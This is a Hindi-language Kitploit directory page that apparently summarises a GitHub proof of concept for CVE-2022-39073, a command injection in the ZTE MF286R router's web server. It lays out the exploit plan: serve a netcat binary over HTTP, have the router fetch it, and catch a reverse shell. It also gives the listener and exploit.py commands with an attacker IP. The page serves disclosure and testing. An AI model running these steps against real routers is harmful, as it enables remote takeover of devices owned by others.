Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-39073 — ZTE MF286R राउटर को प्रभावित करने वाली कमांड इंजेक्शन भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट, जिसमें RCE एक्सप्लॉइट शामिल है। | Kitploit
उपकरण/GitHubGitHub/v0lp3/cve-2022-39073
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubv0lp3/cve-2022-39073

CVE-2022-39073

ZTE MF286R राउटर को प्रभावित करने वाली कमांड इंजेक्शन भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट, जिसमें RCE एक्सप्लॉइट शामिल है।

रिपॉजिटरी देखें
114123 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-39073

फ़र्मवेयर विवरण:

root@kitploit:~
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10

पूर्वापेक्षाएँ

  • requests (pip install requests)

कमांड इंजेक्शन

यह भेद्यता zte_net_link_detect बाइनरी और वेबसर्वर goahead बाइनरी में WATCH_DOG_SWITCH हैंडलर के बीच एक साझा कमांड इंजेक्शन है।

ध्यान दें कि भेद्यता का शोषण केवल तभी किया जा सकता है जब राउटर WAN से जुड़ा हो या SIM कार्ड के माध्यम से इंटरनेट से जुड़ा हो। ("ppp_status" कुंजी का मान "ppp_connected" या "ipv4_ipv6_connected" या "ipv6_connected" होना चाहिए)।

जोखिम

  • रिमोट कोड निष्पादन (RCE)
  • मनमाना कमांड निष्पादन

प्रूफ ऑफ कॉन्सेप्ट

एक्सप्लॉइट का विचार netcat स्टेटिक बाइनरी को एक http सर्वर से डाउनलोड करना और फिर उसके साथ एक रिवर्स शेल खोलना है। P.S: इस फ़ोल्डर में शामिल netcat बिग एंडियन है।

  • इस निर्देशिका में एक http सर्वर खोलें python3 -m http.server 8080
  • nc -lvp 9999 के साथ पोर्ट 9999 पर एक लिसनिंग सॉकेट खोलें
  • इस फ़ोल्डर में स्क्रिप्ट चलाएँ python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>

संदर्भ

यह भेद्यता सितंबर 2022 में Andrea Maugeri द्वारा रिपोर्ट की गई थी। https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664

टूल डाउनलोड करें